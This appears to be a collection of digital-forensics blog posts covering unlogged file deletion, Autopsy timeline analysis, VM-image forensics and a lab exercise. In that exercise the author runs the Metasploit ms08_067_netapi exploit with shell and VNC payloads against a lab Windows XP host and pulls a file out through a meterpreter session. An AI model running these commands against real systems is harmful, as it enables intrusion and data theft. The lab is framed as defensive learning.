I want to write a follow-up on my last post about chain-of-commands not properly being captured by many defensive tools. During further research and testing, I observed that built-in Windows Command line actions are also not captured.
For instance, a simple act of deleting a file from the CMD Command-line is neither captured in SYSMON or in Windows Event logs:
CMD.EXE > del /f test_file.txt
The only event observed in SYSMON for the above action was the following:
Additionally, nothing notable was observed in Windows Event logs.
This simple act of deleting a file is a common technique used by the adversaries. This action could be done both manually or through malware. One example where this technique is used is in the case of the Robbinhood Ransomware. In this sandbox report, you can see various quite-delete operations that Robbinhood malware executes.
I understand that there are other means of extracting CMD Command-line execution content. However, many of those require digital forensics analysis.
For instance, you can review Command-line history by analyzing the memory capture using a tool such as Volatility with plugins: cmdscan,consolesor just running stringsagainst the memory image. However, this type of analysis requires either a memory image capture or a specialized commercial solution that can scan live memory content (example). Unfortunately, most organizations do not have access to these enterprise-solutions thus their ability to hunt for such Command-line techniques becomes limited.
MITRE ATT&CK Evaluations also has an entry for this technique 9.C.4 File Deletion where you can select various technologies from the drop-down list and see how they detect this technique.
If you are collecting and hunting full CMD Commandline, I would love to hear about your feedback; especially, if the technology/method that you are using is not one of the ones tested in ATT&CK Evaluations above.
Above is in response to COVID19 – valid until May 15, 2020.
—————————————————————
The process of timeline creation is extremely critical in forensic because it provides you with a holistic view of the system in question and gets you one step closer to answering those key questions. There are multiple ways that you can create a system’s timeline. However, the one I recently came to know is Autopsy’s Timeline Analysis module and here is my first experience with it.
Autopsy can be downloaded from here. The installation is simple – no dongle required!
Welcome Screen
To test the timeline module, I used one of my test windows 7 machines. And to create some activity, I browsed the known-bad-URLs and downloaded some potentially malicious files. Also, installed AVG AntiVirus Free edition as a basic detection mechanism. However, to my surprise, AVG was able to detect and block most of the executables that I tried to run.
Since I had to run some executable to create the lab, so instead of making exceptions in AVG – I decided to uninstall it. I figured it would be interesting to see how the evidence of software uninstall will be presented.
I went back and ran the following three executables: sydzcr22.exe, b.exe, b01.exe.
In addition, I added the total of two new accounts on this machine. First, one (admin01) I created using the windows “Manage Accounts” interface and the second (admin02) via command prompt. Both accounts have administrative privileges.
Lastly, I made a logical image of the target system and created a new case in Autopsy. Here is a guide on how to create a case and add evidence in Autopsy.
This is how the output after the initial processing is completed looks like:
As you will notice from the screenshot above, a lot of the common places that you would want to look in an image are readily available in a nice, organized manner. The first thing I did was perform keyword searches for the three executables that I ran earlier (sydzcr22.exe, b.exe, b01.exe) just to confirm their presence.
The keyword search was pretty fast and it found all the three exe files that I had browsed and installed. In the screenshot we can see the exes’ browsed URL, date, and the location on the disk where that piece of evidence is located; index.dat. I searched the Temporary Internet Files but was only able to find one B01.exe but not others; not sure why.
The second thing I wanted to look for is the installation of the AVG antivirus and then the removal. Let’s see what we find.
The first place I looked at was the “Installed Programs” menu option:
I do not see any instance of AVG here. But regardless, I guess this is a handy feature to have quick access to in order to see the installed applications at the time the image was acquired. I see the AVG2015 folder under Program Data directory but not much more:
So with this, now we get to the reason why we started this project – timeline! The process for generating a timeline is pretty simple. You go to Tools and the Timeline. You see a status bar and at least for my image (120G) it took around 2-3 minutes and I had my timeline opened in the second window:
Graph Legend
As you will notice in the second screenshot above, there are some anomalies in the time range. You can easily modify the scope by using the scale on the top left, the start and end (not shown in the screenshot) options towards the middle of the screen as well as using the graph itself to zoom into the date of interest. From all of these options, the one that I liked the most is right-clicking on the time range of your interest and select the “Zoom into Time Range” options. In my option this is faster and easier than messing with the scales:
As you continue to zoom in you will get to the month timeframe where you can see which date of the month had what amount of events:
Lastly, when you zoom into one specific day of the month you can see the events by the hour:
So getting back to finding AVG activity, I first see the web activity
In the screenshot above, please take a note of the “Text Filter” option; which comes handy in narrowing down results. In fact, if you don’t narrow down the results the system will not be able to display the events and instead will give the following message:
However, it seems like if you change the “Visualization Mode” from “Count” to “Details” you are able to overcome the above limitation. However, the output is in a different format:
Notice above that when you hover over any of the events, you receive the option for further details by the symbols of “+” and “-“. However, after spending some time going through the information presented above, I did not get close to finding answers to the original questions. This is not to say that information here is not valuable, it just did not come handy in answering our particular questions.
So my next step was to extract windows event logs from the image and review them. And pretty quickly we find the following entries:
AVG Installation Completed Successfully AVG Installation Successful Without Errors
Similarly, we find log entries for removal:
AVG Successful Removal Without Errors AVG Removal Completed Successfully
With the information presented from our target system’s event logs, we are now able to see both the successful installation and later the removal of the AVG anti-virus software. It would have been nice to see some of the event log information in our timeline.
On a side note, while looking through application logs, I found two application crash events; one for our b.exe and the second for sydzcr22.exe – both of which we attempted to install from the browser earlier in the lab.
b.exe Application Crash
The last question that we wanted to answer was the evidence of account creation for admin01 and admin02. Both of which we created earlier – one using Windows Account Management interface and the second via command prompt. Here is the windows log event for the first one:
Here is the evidence of the second account creation:
Based on the above to account creation logs, we cannot tell which account was created via windows interface vs command prompt. The only difference that we see is that one account has its password set (which is the account we created through command prompt and had to give it a password but without this knowledge we cannot tell the difference). Also, the account created from the command prompt (admin02) does not have the “Display Name” set; maybe this could be an identifier.
On a separate note, if we go back to our timeline and see the events around the time frame of the above windows events we see the following activity.
If you look at that first entry, it refers to the following default account display picture:
Around the same time we see security logs getting updated:
This is all the information that I can pick out from our timeline that I think is there to indicate the creation of an account. However, what’s interesting is that in our timeline we do not see any entry to command prompt – which we used to create the second account and if there was an entry for it, it could be used as another hint.
Anyway, at this point, I was not sure how to go about getting user account artifacts so I reached out to the people of DFIR community via Twitter and as always got wonderful feedback. One of the suggestions was to perform shellbag analysis. This was a great suggestion however, this was not going to work in our situation. The reason being, shellbag analysis requires two artifacts for each account: ntuser.dat and usrclass.dat. These two artifacts are created the first time the user interactively logs on at the computer; establishing a user account on the computer does not create a profile for that user. In our case, we did not login using either of the (admino1, admin02) accounts after we created them, hence there aren’t any profile files like there are for our main (dfir) account:
Some of the other suggestions included examining memory of the target system (which we did not acquire) and reviewing windows command line history (which is not saved by default on the disk running Win7-32 but again could have pulled from memory).
So the last thing I wanted to check out before closing out this lab was to do a quick comparison with traditional log2timeline. So I ran l2t against the same disk image and here is the outcome of our super timeline:
There is a lot that is going on here but the key things to look at is when the two accounts are created and what happens to them. The first account (admin01 – created via GUI) is underlined in red and the second account (admin02 – created via cmd) is underlined in blue. The section marked in green shows the launch of command prompt. It is obvious that the first account was created right after the creation of few security event logs however, the second account was created right after the launch of windows command prompt (there is some delay in seconds but that was due to me confirming the cmd line syntax before executing).
The last thing I want to point out from our super timeline – which correlates with our earlier finding during the manual review of event logs and is the small section in the screenshot above highlighted in yellow. You will notice that for the first account, admin01 there is an account name right next to the SAM ID of the same name. However, for the second account we just see the SAM ID but no account name.
This concludes my exploration of Autopsy and its timeline feature. The goal here was not to simply go through the different menu options of this powerful tool but rather run it against a made up scenario. And even the scenario itself is something that I made up as I went along in the process; so to be honest, I am not sure how some of the other (even commercial) tools would handle this scenario. In the end, the whole post became another CDR entry where we almost went through all the three stages to an extent. Anyway, it took me some time to gather all the screenshots and do this write up from the time when I actually did the lab; so I am sure numerous updates have been made to the tool since then. Overall, I am very pleased with the tool and the capabilities that it provides; hard to believe its free! When I did the lab, the timeline feature was fairly a new addition to the tool but we can surely expect some awesome updates to it. Definitely, an awesome, powerful and fast tool to have in your toolbox – check it out!
(Here is the update on user account creation analysis done by @b!n@ry – Great job!; instead of looking for usrclass.dat for the new accounts created, you would look into the account you suspect created those two new accounts! Ref: 1 and 2. Also the net.exe and net1.exe prefetch files proved to be extremely valuable). #NoteToSelf! :)
I am sure that most of you have heard that in order for you to be good at any one specific security domain you need to have a solid understanding of the opposite domain as well. This is especially true between good and bad guys. You cannot be a great responder if you do not understand some of the basic techniques bad guys are using to break into your environment. Similarly, in order for you to successfully penetrate and maintain persistence in your target environment, you need to understand how forensicators track your movements.
Like many of you, I have heard this concept during many presentations and conferences. And like many of you, I have wondered how do I best accomplish this task myself. I, for one, aren’t an expert in any specific domain so in order for me to just catch up on the opposite domain – would actually require doing both sides – good and bad. And so with this exact idea in mind, I am kicking off – which I am hoping is going to be a series of posts that will encompass the complete cycle: compromise -> detect -> respond (CDR).
Now, like I said in the beginning, I do not specialize in any particular domain but what I am hoping out of this project is that I will gain not only just a better but a holistic understanding of the core domains that make up infosec. So with this in mind, here is my setup.
I have setup three different environments with the basic, free tools that will help me with each of the CDR stages:
Compromise – Metasploit, Armitage, Nessus, SET Detect – EXE Radar Pro (trial), different A/Vs, Snorby IDS (Thanks to dfinf2 for showing me the ropes on setting this up initially. I had to re-purpose this – but down the road, i plan to expand IDS capability.) Respond – SIFT, Redline, Splunk
In addition to the above tools repository – each environment has a diverse group of vulnerable machines that will be used as targets.
The last thing I want to cover before the official kick-off is that during this whole process my goal will to be to go through all three of the CDR stages as quickly as possible with the least amount of effort. The idea behind this is that in the real world there isn’t a lot of time to get answers; typically you have a short period of time to get as much done as possible so that is what I plan on doing with these exercises. In addition, I will not be documenting each of the steps that I take. There are more than enough online guides that walk you through – for example how to use Metasploit against a specific target so there isn’t a point for me to just duplicate that work. In fact, during these exercises, I plan to use those same guides since I necessary don’t know how to use Metasploit myself :)
With that i think i have covered all the overview topics that i wanted to cover. But as environments, tools and other things change i will mention them in the future posts. And now it’s time to kick off our first CDR – and whats a better way to kick off than using XP as your target!
———————
case: 001-01
Target: WinXPProSP2 @ 10.0.0.15
Compromise I started with basic nmap reconnaissances scan to see what i had open on the target machine.
Nmap scan report for 10.0.0.15
Host is up (0.00040s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:91:68:A0
Device type: general purpose
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop
The nmap report above only shows three TCP ports open on our target system. But it does confirm the OS of the system and the network connectivity. The next thing that I did was spend some time researching online for XP Metasploit exploits that I could use in this exercise. And in no-time i had few exploits that would give me remote access to the target system.
Here is the first one:
Name: Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Version: 0
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
And now the payload – nothing like the VNC Inject for the first exercise!
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp
payload => windows/vncinject/bind_tcp
msf exploit(ms08_067_netapi) > set rhot 10.0.0.15
rhot => 10.0.0.15
msf exploit(ms08_067_netapi) > check
msf exploit(ms08_067_netapi) > set RHOST 10.0.0.15
RHOST => 10.0.0.15
msf exploit(ms08_067_netapi) > check
[*] Verifying vulnerable status… (path: 0x0000005a)
[+] The target is vulnerable.
msf exploit(ms08_067_netapi) > exploit
And just like that we have Metasploit Shell (in blue) and we can remotely see the target system’s desktop (the black command prompt windows is on the target system)
MetasploitShell
Detection
At this point, we have successfully been able to compromise the target system (using probably one of the oldest exploit for XP – but we are just getting started!). But before we move forward – with little more of compromise let’s check what, if anything we have from the detection point of view after our first attack.
Here is what we see in the IDS so far:
IDS VNC Detection
Now besides the fact that IDS triggered on our first exploit – I am even more happy to see that our IDS deployment is working overall!
Based on the above information – we have the basic information to initiate the response stage. We know the malicious source IP as well as the IP of the impacted host in our environment. But before we move forward with the response – let’s just do a little bit more of compromise and see if we get successful in our second attempt or not.
Compromise 2
In the second Compromise stage, we are using the same exploit as the first Compromise (ms08_067_netapi), however, our payload is now different.
msf exploit(ms08_067_netapi) > set payload windows/shell/bind_tcp
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.15
[*] Command shell session 2 opened (10.0.0.23:59317 -> 10.0.0.15:4444) at 2014-06-22 17:49:04 -0400
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
As you will notice from above that our payload successfully delivered on the target system and in return give us access to target system’s shell. Now to make this scenario more interesting, I created a text file on the Windows XP target machine and named it Important.txt in My Documents under the Administrator account. Now my goal will be to read the content of that file from my Metasploit system and possibly copy it out to my local hacking machine.
Accessing Important.txt File
In the screenshot above we are able to change directory from C:\WINDOWS\system32 and go to My Documents of the Administrator account and view the content of the Important.txt file.
So with above, our first goal is completed – we have been able to read the content of the Important.txt file. Now the second goal was to copy out the file on our local Metasploit machine. For this, we established another session with our target windows machine and instead of a windows shell, this time we got a meterpreter session after our payload.
Download Important.txt From Target To Local System
After the successful payload delivery, we ran the getpid command to see which process on the target machine we’re binding with (this will be handy in the Response step). After that, we changed directories to administrator user’s documents and downloaded the Important.txt successfully.
This concludes the Compromise 2 stage. At this time our target windows XP system is severely owned! – the IDS has triggered now the total of 12 alerts related to this event:
Total IDS Alerts
Now we will move towards the Response phase.
Response
We already know that our Windows XP machine is compromised so we will proceed with collecting the memory of the system. In addition, we will run some sysinternal tools to confirm the networking communication to the malicious IP and determine the process which was involved in this communication…
Recently, I have started performing digital forensics on virtual images and wanted to briefly share the process that I am following and the challenges that I am facing:
The Process:
Originally, the machines in the environment are virtualized via VMware ESX.
To take the forensic image at a given point, the virtual machine is suspended and copied to a forensic workstation.
Following the second step, retains the memory in the vmem file and allows for memory analysis.
The suspended machines are resumed on the forensic workstation via VMware Workstation.
The Challenge:
Usually, the machine coming from the ESX has large resource allocations that are not available on the forensic workstation. For example, the machine in ESX can be allocated 12GB of RAM and 4 processors – however, this cannot be met with what is available on the forensic workstation. This results in the machine being non-responsive when resumed on the VMware Workstation.
When you are able to resume the machine in VMware Workstation you are not able to transfer any tools over without first installing the VMware tools – sometimes this requires a restart.
If the machine was originally part of a domain and the machine was suspended without someone already logged-in; you do not have a way to get into the system other than resetting the password via some live disk. The other option is to retrieve the password from the memory.
If the machine itself does not have enough disk space for you to save the output from all your tools then you have to enable Folder Sharing feature on the VMworktation.
These are some of my immediate experience from performing forensic on virtual images. The reason for this post is to get feedback from the forensic community on how I can improve my process and make sure I minimize the changes made to the evidence.